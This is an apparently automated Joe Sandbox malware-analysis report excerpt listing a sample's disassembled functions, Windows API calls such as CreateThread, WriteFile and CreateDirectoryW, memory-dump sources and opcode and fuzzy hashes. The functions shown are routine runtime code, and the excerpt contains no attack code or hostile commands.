                                                                                  • Instruction Fuzzy Hash: 9E31493191020AAFDF11EFA8E645B9DB7F5EF41320F250099E8049B2A2EF325D60CF50
                                                                                  Function 0028101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00281043
                                                                                  • SetThreadPriority.KERNEL32(?,00000000), ref: 0028108A
                                                                                    • Part of subcall function 00276C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00276C54
                                                                                    • Part of subcall function 00276DCB: _wcschr.LIBVCRUNTIME ref: 00276E0A
                                                                                    • Part of subcall function 00276DCB: _wcschr.LIBVCRUNTIME ref: 00276E19
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                  • String ID: CreateThread failed
                                                                                  • API String ID: 2706921342-3849766595
                                                                                  • Opcode ID: bcdbd17c51cec546be18efddef06cfd74515d6ff459828303d6b7145b6005235
                                                                                  • Instruction ID: b32f01b3dedfd41165374c8a05f12d696be7b05283b4a036389fdd7c5ad65f02
                                                                                  • Opcode Fuzzy Hash: bcdbd17c51cec546be18efddef06cfd74515d6ff459828303d6b7145b6005235
                                                                                  • Instruction Fuzzy Hash: BB012B793253096FD3307E28AC59B76735CEB51791F20042EFA4A521C4CEA168B58724
                                                                                  Function 0028E528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (($PDu<(
                                                                                  • API String ID: 1269201914-240991587
                                                                                  • Opcode ID: 8ef6531abbc7930c4222d8866184f26ce6c5911b47cb0b560db75142aba2f6d7
                                                                                  • Instruction ID: f5be18b63b977fb74de08109d573506aebee5e7871cae996e31d5316a036b55f
                                                                                  • Opcode Fuzzy Hash: 8ef6531abbc7930c4222d8866184f26ce6c5911b47cb0b560db75142aba2f6d7
                                                                                  • Instruction Fuzzy Hash: 79B0928927A0406D2508B2085902C3A050DC0C6F11371802EB804C01C0A8800C210A32
                                                                                  Function 0028E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E51F
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: 2($PDu<(
                                                                                  • API String ID: 1269201914-723548999
                                                                                  • Opcode ID: dc26ef18bf76e3df5c45e859b84d9534207fa7111811876329352fab0ae0edad
                                                                                  • Instruction ID: cce712d7c6a13860f7cf7e78a51e89cb015b94fa06281240c3a95ac1a6ee1ee8
                                                                                  • Opcode Fuzzy Hash: dc26ef18bf76e3df5c45e859b84d9534207fa7111811876329352fab0ae0edad
                                                                                  • Instruction Fuzzy Hash: 5DB0928927A0007E2508B2085802D3A010DC4C2F11371802EF804C01C0A8800C200A32
                                                                                  Function 00279F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0027D343,00000001,?,?,?,00000000,0028551D,?,?,?), ref: 00279F9E
                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0028551D,?,?,?,?,?,00284FC7,?), ref: 00279FE5
                                                                                  • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0027D343,00000001,?,?), ref: 0027A011
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite$Handle
                                                                                  • String ID:
                                                                                  • API String ID: 4209713984-0
                                                                                  • Opcode ID: e4c87f0a6f4728e7596816da0efd061fd189bb34c53f5044c306dd654886065b
                                                                                  • Instruction ID: 04b8790aaf584a0bd1cd566a916de96690687a7c2c12e98ccb2e3cf67cb2a3d0
                                                                                  • Opcode Fuzzy Hash: e4c87f0a6f4728e7596816da0efd061fd189bb34c53f5044c306dd654886065b
                                                                                  • Instruction Fuzzy Hash: DB31C231218306AFDB14CF24D818B6E77A5FFC5720F008919F94997290CB759DA8CBA3
                                                                                  Function 0027A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0027C27E: _wcslen.LIBCMT ref: 0027C284
                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A2D9
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A30C
                                                                                  • GetLastError.KERNEL32(?,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A329
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 2260680371-0
                                                                                  • Opcode ID: d0ea8588bcb39dec9858286f4ddb4ca62de153d4bb6326ac400d197b27dd0490
                                                                                  • Instruction ID: 8d3dad69840fab4b57a36f08953b0e6bb1afd59cf44ffb9c712cb89d3d36fa1f
                                                                                  • Opcode Fuzzy Hash: d0ea8588bcb39dec9858286f4ddb4ca62de153d4bb6326ac400d197b27dd0490
                                                                                  • Instruction Fuzzy Hash: 4E01D8316242516AEF21AF755C09BFE3348AF4A7A0F04C455FD09D60C1DB74CAA1CAB3
                                                                                  Function 0029B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0029B8B8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Info
                                                                                  • String ID:
                                                                                  • API String ID: 1807457897-3916222277
                                                                                  • Opcode ID: 86bf0a0d6cbb4dbc5f38e939f9d9a009a5d68c03790485509a533b922174e67d
                                                                                  • Instruction ID: e455465d8b8b4990b0bd7b251584629e6b21c546e6d36e406f6de89eb617600a
                                                                                  • Opcode Fuzzy Hash: 86bf0a0d6cbb4dbc5f38e939f9d9a009a5d68c03790485509a533b922174e67d
                                                                                  • Instruction Fuzzy Hash: 4A41177052438C9FEF228E24DD84BF6BBADEB55304F1404ECE59A87142D375AA55CF60
                                                                                  Function 0029AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0029AFDD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: String
                                                                                  • String ID: LCMapStringEx
                                                                                  • API String ID: 2568140703-3893581201
                                                                                  • Opcode ID: 97d6accd17dfeed580ec659ed0d0aa989b780e7e7363479f5a80cef5bf537ddc
                                                                                  • Instruction ID: 07623b4be3067082e8c68b2e918968ac02ae0fe3610ef5dee9545c542bc45571
                                                                                  • Opcode Fuzzy Hash: 97d6accd17dfeed580ec659ed0d0aa989b780e7e7363479f5a80cef5bf537ddc
                                                                                  • Instruction Fuzzy Hash: A201E53251420AFBCF02AF90EC06DEE7F62EF4A754F014155FE1466160CA728A31AB95
                                                                                  Function 0029AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0029A56F), ref: 0029AF55
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                                  • String ID: InitializeCriticalSectionEx
                                                                                  • API String ID: 2593887523-3084827643
                                                                                  • Opcode ID: 95a1fb84b047af950d6ea0e4589ce68a5bda0b4b247d66503d4d6f692c03a9aa
                                                                                  • Instruction ID: 0f3c36e68e65876104168c59b714273e7192722010b7af301f2af937700dc310
                                                                                  • Opcode Fuzzy Hash: 95a1fb84b047af950d6ea0e4589ce68a5bda0b4b247d66503d4d6f692c03a9aa
                                                                                  • Instruction Fuzzy Hash: 1BF0E931655209BFCF119F50DC0ADAEBF61EF06711B004056FC089A260DE724E319BCA
                                                                                  Function 0029ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Alloc
                                                                                  • String ID: FlsAlloc
                                                                                  • API String ID: 2773662609-671089009
                                                                                  • Opcode ID: c2f9d5e6457f103a66d01acd839341e1bd1ec620d811e2cd4e13edb672e18487
                                                                                  • Instruction ID: ea302939cdc8e7abf4dc7f3063664b5c51f99824c635d1169f412c5e12f6d8bc
                                                                                  • Opcode Fuzzy Hash: c2f9d5e6457f103a66d01acd839341e1bd1ec620d811e2cd4e13edb672e18487
                                                                                  • Instruction Fuzzy Hash: 97E02B31765319BBCB01AB65EC06E6FBB54DB47721F0101ABFC05A7240CD705E2186DA
                                                                                  Function 0028E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: f6ac4ba13326f1d425f53b6bab747c1277ef8bcb04d14e02a09b01226e60bd22
                                                                                  • Instruction ID: 6d7daf96d3750377fa943b0bfd9cc870c1361367a671aec59319ac450b3ed116
                                                                                  • Opcode Fuzzy Hash: f6ac4ba13326f1d425f53b6bab747c1277ef8bcb04d14e02a09b01226e60bd22
                                                                                  • Instruction Fuzzy Hash: 81B092D937A142AD3504A2495846C3B020DC083B10331402AB809C01C09880AC200E32
                                                                                  Function 0028E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 362bf81192fa5de0dd1ba6f7709ee320ebe12619a8495fbed9bd8ff647152593
                                                                                  • Instruction ID: f9ce37b603f3b0f55c07205c89e728d91c3fbc2cc9ed88f49932dd5be6db66f1
                                                                                  • Opcode Fuzzy Hash: 362bf81192fa5de0dd1ba6f7709ee320ebe12619a8495fbed9bd8ff647152593
                                                                                  • Instruction Fuzzy Hash: 87B092DA37A001AD2504A2055806C3A021DC083B10331802AB809C02C09880AC240E32
                                                                                  Function 0028E1D1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 7c659ff65078ef23ece1931c70ddc68f55cfd965bd0c6cc42cc334cd1ad23ff8
                                                                                  • Instruction ID: 1ac5482d2bba62063facad0e6a95ba51b39274c13a2fd4d343c296c36d628f1c
                                                                                  • Opcode Fuzzy Hash: 7c659ff65078ef23ece1931c70ddc68f55cfd965bd0c6cc42cc334cd1ad23ff8
                                                                                  • Instruction Fuzzy Hash: 99B092D937A141AD250472455846C3B020DC083B10331842AB809D04C09880AC200D32
                                                                                  Function 0028E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: ed8af4353f610a2e4c2b8a3e6afd3ff9f6a9a395b9459fe0072b9f270651e937
                                                                                  • Instruction ID: bd18fcd1008d3a41c4a40f504e28f8fcce183a4b5b5f85cfad17abdf86560df0
                                                                                  • Opcode Fuzzy Hash: ed8af4353f610a2e4c2b8a3e6afd3ff9f6a9a395b9459fe0072b9f270651e937
                                                                                  • Instruction Fuzzy Hash: 0AB092E937A101AD2544A2055806D3A020DC082B20331412AF809C01C09880AD600E32
                                                                                  Function 0028E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID: (
                                                                                  • API String ID: 1269201914-2823978992
                                                                                  • Opcode ID: 2dd0ba6e045a33d3b7aeffd3e5bfae0ec070123ade3450b677787ed186bed849
                                                                                  • Instruction ID: 4ecbd0e6bcb120bf50a33ae64b47f803b6f8b00eafc8d62169f970418693575d
                                                                                  • Opcode Fuzzy Hash: 2dd0ba6e045a33d3b7aeffd3e5bfae0ec070123ade3450b677787ed186bed849
                                                                                  • Instruction Fuzzy Hash: A9B092E937A002AD3504A2069806D3A020DC082B20331402AB809C01C09880AD200E32
                                                                                  Function 0028E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E1E3
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
